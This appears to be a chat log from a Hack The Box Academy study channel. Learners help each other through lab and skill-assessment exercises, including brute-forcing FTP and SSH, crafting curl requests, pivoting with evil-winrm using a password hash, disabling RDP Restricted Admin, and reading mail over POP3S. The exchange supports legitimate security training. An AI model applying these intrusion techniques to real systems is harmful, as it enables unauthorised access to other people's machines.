im a bit dyslexic

Attacking Common Services: Medium Lab

I found the opened ports, besides the obvious ones there's loads of 5 number ports above the 10000s.
I tried to bruteforce FTP on 2121, Tried anonymous login as well, bruteforced SSH, didn't work.
I haven't used smtp user enum(since 23 isn't open) I might resort to some tactic that will obtain info from the pop3 as that's the only I can possinly extract info. I haven't used rockyou.txt yet, hence I will probs bruteforce with the provided user list and rockyou.

Am I on the right path?

• I used dig axfr and found them .inlane domains. I did dig for txt , nothing found.

Copy/paste

This lab gives you creds

ceil

Bruh.

Wait no?

Oh wait

They must've changed it again

D:

But you do have a username

And the password can be bruteforced

Peep the banner on that port

No?

Peep the banner?

So curl?

Nope

Just attempt to connect and you'll see

Oh..the ip:port on the firefox

or with the ftp command

W marcie.

Well I tried ftp 2121, but uh..can you assign 1 service toi multiple ports??

curl -X POST -d '{"search":"flag"}' 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php
curl: (3) URL rejected: Bad hostname
curl: (6) Could not resolve host: application
A valid authentication cookie is required!

I don't think browsers support ftp anymore, it should be deprecated since like 2020

¯_(ツ)_/¯

As with the this whole module, go slowly, and read, re-read, and re-re-read everything... if still stuck, feel free to DM me what you've done, what your thoughts are, etc and will help from there.

oh i have some extra quotes

idk whats wrong 😦

maybe you need to use the hostname, just add it to the hosts file

I dunno just going by the error

where is the endpoint like http://IP....

wdym?

your curl request isnt complete

what is missing?

It's at the end of his line...

^

damn xD

think i need glasses lol

curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php is what the module shows. but we replace london with flag

Did you get the session ID from the site, or from the section.

my site

from the search.php

You're missing a '

Basically it thinks that application is your hostname

where is this missing '?

not sure why it's not picking it up at the content-type

-H "Content-Type: 'application/json'"

Oh wait

curl -X POST -d '{"search":"Flag"}' -b 'PHPSESSID=68v86efjbp2eaen62v4uuco0f1t' -H 'content-Type: application/json' http://94.237.63.93:30436/search.php

wait

thats my old one

1 sec

curl -X POST -d '{"search":"flag"}' 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php

😦 this shouldnt be that difficult

Try:
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq Content-Type: application/json' http://94.237.63.93:30436/search.php

got a port number error that time

Or
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php

no sit

sir*

What do you mean "port error"

URL rejected: Port number was not a decimal number between 0 and 65535

Which module/chapter are you doing?

wait 1 sec i think i know my issue

ill tell you if this next thing dosnt work

Only other thing I can suggest at this point is to put the URL inside single quotes

or put the URL at the start

oh yes a whole number, enough for today 😄

im doing web requests page 7

POST

Works for me

i will try the ip at the start then

weird

Possibly try rebooting the target for a different IP and sessid

yea idk whats up....

I feel like an idot.. idk why i cant do this

could it be cause im using windows console and not the imbeded VM?

im ... stupid

that was my issue

i had run out of sessions for academy and bought some blocks and it worked

That's not gonna matter for spawning targets

For using the pwnbox vm: yes

weird. well i used the embded VM and it worked right away

The issue was windows

ah

i figured

A lot of these commands are assuming linux

I see that now

So likely the windows version has some differences in syntax

well stupid mistakes make great learners

thank you for troubleshooting earlier

you'd have to do like curl --help in the windows cmd to see what flags line up

But imo just set up your own vm

¯_(ツ)_/¯

i have one, but it was giving me issues yesterday too

If you're using windows, curl is an alias for IWR

"Giving issues" vague

Yo Marcie, so I found the user for the Attacking CS Medium lab on the port you told me, so I proceeded to bruteforce pretty much everything with pws. list be it ssh,ftp on 2121 and even 30021. I thought that having the domain inlane--- would assume there would be an email with the UserIFound@inlane---.htb

Any tips?

Besides the bruteforce.

So now I will be trying rockyou.txt I suppose.

Username should be lowercased

2121 is the initial vector

Strange.

Was getting weird errors, then I switched to pwn box and it was fine

If it comes up again I’ll holler

But again thank you for dealing with me Marcie I appreciate it

Don't just @ me.

Likely it's user error

🤙 ok

so after hours I am in the last step for skill asssesment for tunnelling this is what I found in the domain controller machine what should I do now please

Check all the ports

are there more??

One of em should have a vulnerability I guess

No I’m assuming one of the ones shown has a crack in it

There's no advanced hacking skills required

I dunno which service to interact in the last hop

The last user has dc access iirc

From rdp

but there is no rdp in nmap I am running the scan again

I will try rdp to it

445 would be the port

The last port does ? How can you tell ?

wait

Rdp to the last host you have user access to

I was gonna say that lol had no clue why that one spoke to me

Smb

I remember it from one of the intro modules in lab

Since you haven't done this module. Please try not to make assumptions

Will do

This module is related to pivoting and moving through an ad network

Using exposed creds and such to move through it

There's no real advanced cracking or skill required except enumeration

can you tell me the tool to use?

I mean smb would just be smbclient

But also just rdp

You have a user on the last host

Just rdp and check available files

How is that something you are able to tell just by looking at the list of ports?

I know this based on the info they've given

The ports list is a bunch of normal windows ad ports

failed on both systems

You should have a host you have with that user

I definitely recall rdp for this

yes I am using that host see the cmd

am I doing something wrong?

Check the files

Either under network or this pc

I recall this being like really dumb

But iirc v* is the last user you get

yes I checked that but its asking pass

Enter user pass and it doesn't work?

DisableRestricted admin?

I do not have the pass

Is that covered?

I only have the hsh

yes

which module is he on

Oh if that's covered in the module...

You have rpc ports for that

Evil-winrm

get in the cmd and add the disable restricted admin, then go to the registry editor control/lsa

^ what marcie said

This is the pivoting module skill assessment

ooo, that's my next module

I just recall it being fairly straightforward

still stick on the medium lab

I did that , but uh...no success, reading through my ftp section rn.

I must be missing smth.

I give up my rdp sessions got terminated

I dunno why

I dknt recall Simon being the user

rdesktop won't give you up

that's what I found on that open port.

I have this much time

Huh. Thought if was ceil

Lemme send u what I found

Go for it

A banner.

I could absolutely be misremembering

That's the first. When I got anonymous login I found a file named simon.

Which I couldn't get.

Not 30021

2121

Anonymous didn't work for that either.

Lemme retry.

Is it a file?

USER'S ftp server

It was a strange response, not an ordinary file or smth.

When I got it via wget it showed the banner.

Could be a dir btw

Maybe try changing directories to this weird "simon" file :)

Bruh.

But also

Was I right?

Lemme try

I think you are 😄

I honestly haven't touched this module in a minutr

So I'd have to spin it up and check with pwnbox

OH MY

It was a directory, how did I not see the Drw

I will cry

It's also entirely possible they changed it since I last did it

Dude, I have no idea what I have in my mind about CPTS when I miss smth as simple as that

Maybe it's 2 am and thats why

Go sleep

Yooo, it's passwords.

Ain't no way, ima lose my 7 week streak.

Wdym you had a whole ass week

wut

Oh, nah I bought a new pc and had to set it up and everything.

So I had to transfer my shi.

I have a folder where I keep my HTB experience with every skill assessment/lab that I have completed and the whole process.

I had to make sure that doesn't get lost else I will cry.

Just do a tier 0 module

Ez money

what point would there be if it was easy

ima refer u to smth u said

:)))

I found the flag but it's under root

Stop exposing me

Evaluate running services

This module has def changed since I last did it

Yeah, I logged in via SSH and pop3, nothing.

It appears that the mesage which gave an ssh key was in pop3 and ftp as well as in ssh.

Pop3s

I will try that, completely forgot about 995.

What's the difference anyway?

More secure?

Yes

And sometimes mail services will not allow interaction with the insecure port

Connection closed by foreign host...sigh.

I need a gun.

Oh wait I wrote pop3s instead of 995

Nevermind, same sh.

Yes

Lol

Now, there was another way.

Don't forget to log in with
USER
PASS

That I saw in the footprinting.

Likely using browser

Yeah, it kicks me right when I enter the user.

USER username

I can try with the user@domain

Same sh

How do I do it through the browser?

Lemme check smth real quick.

Logged in just fine for me

openssl s_client -connect 10.129.14.128:pop3s

I can try that

yep that's what i did to connect

oH bruh, I use telnet

You need to use openssl for the secure ports

That's why

Also you'll need to replace spaces with newlines

Yup, same message nonetheless.

I tried password reuse, nothing.

Bash history is clean.

I did try the ssh key for the root but requires root password.

Eventhough I did chmod 600

Read my message

Which one.

Replace spaces with newlines

Oh...

In the SSH Key?

I knew smth was wrong when there were whitespaces.

Still error, can I send you the SSH key, it should be fine?

It works fine for me after replacing the spaces in the ssh key with a new line

It should be 16 lines.

As long as it starts -----OPEN and -----END

Yup.

Yes

Hi!

Hi.

Hi

that's what the md5sum should be

so #cpts is for Testing Security of stuff right?

Lemme retry.

I love that sentence

Ty

CPTS is the certified Penetration Testing Specialist Certification

What does it do?

https://academy.hackthebox.com/exams/3

Finding bugs to log in?

Or stuff

it's a certification exam akin to OSCP

CBBH would be the web based certification exam
https://academy.hackthebox.com/exams/2

Yup, same, I will change it to mod 666.

Although it wouldn't change much.

600 would be the technically correct perms

or 660

i had a account for it

Hm.

but i'm able to login just fine with that ssh key